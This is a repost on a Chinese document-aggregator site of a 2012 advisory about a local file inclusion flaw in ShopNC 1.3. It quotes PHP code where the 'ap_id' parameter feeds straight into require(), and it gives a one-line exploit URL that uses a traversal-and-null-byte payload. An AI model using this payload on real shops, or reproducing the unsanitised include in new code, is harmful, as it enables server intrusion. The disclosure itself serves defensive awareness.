首页 > 教育资源 > 资料大全>

ShopNC 1.3鸡肋本地包含漏洞预警 -电脑资料

ShopNC 1.3鸡肋本地包含漏洞预警 -电脑资料

时间:2012-03-09 09:11:21
染雾
分享 WORD下载 PDF下载 投诉

推荐文章

vcf转excel
热度:
 开业花篮条幅贺词
热度:
 上海退休养老金上调
热度:
 工艺美术专业就业前景
热度:
 中考政治开卷考试“四忌”
热度:

这个东西前面还有个xss http://www.badguest.cn/Article/201107/98039.html

--------------------------------------------------------------------------------

GPC面前一切都是浮云,

ShopNC 1.3鸡肋本地包含漏洞预警

。。所以鸡肋。。

./control/adv.php

class advControl {

/**

*

* 广告展示

*/

public function advshowOp(){

if(trim($_GET['ap_id']) == '')exit;

$time= time();

//加载广告位缓存文件

$ap_cache_file = BasePath.DS.'cache'.DS.'adv'.DS.'ap_'.$_GET['ap_id'].'.cache.php'; //直接包含了。。

if(file_exists($ap_cache_file)){

require($ap_cache_file);

}else{

exit;

}./global.php

if($_GET['act'] == 'adv' && ProjectName == ''){

define('

ATTACH_ADV','upload/adv');

require_once(BasePath.DS.'config.ini.php');

define('SiteUrl',$site_url);

$advshow_classfile = BasePath.DS.'control/adv.php';

echo "

sbsb

";

if(file_exists($advshow_classfile)){

echo "

sbsb

";

include_once ($advshow_classfile);

$advshow = new advControl();

$advshow->advshowOp(); //this..

}else{

echo "Adv System Inner Error!";

}

略Exp

http://www.badguest.cn/2008/upload/index.php?act=adv&ap_id=.sss.sb%00

修古:

参考以上代码分析以及本站前面的文文章

From:http://t00ls.net/thread-20191-1-1.html

ShopNC 1.3鸡肋本地包含漏洞预警 -电脑资料

将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档文档为doc格式

相关推荐

复制全文
WORD
PDF
下载本文

点击推荐

Copyright © 2019 ~ 2022 hxlib.cn 古诗文网 版权所有

向你推荐的相关文章

相关文章列表

下载文档
ShopNC 1.3鸡肋本地包含漏洞预警 -电脑资料

手机扫码分享

Top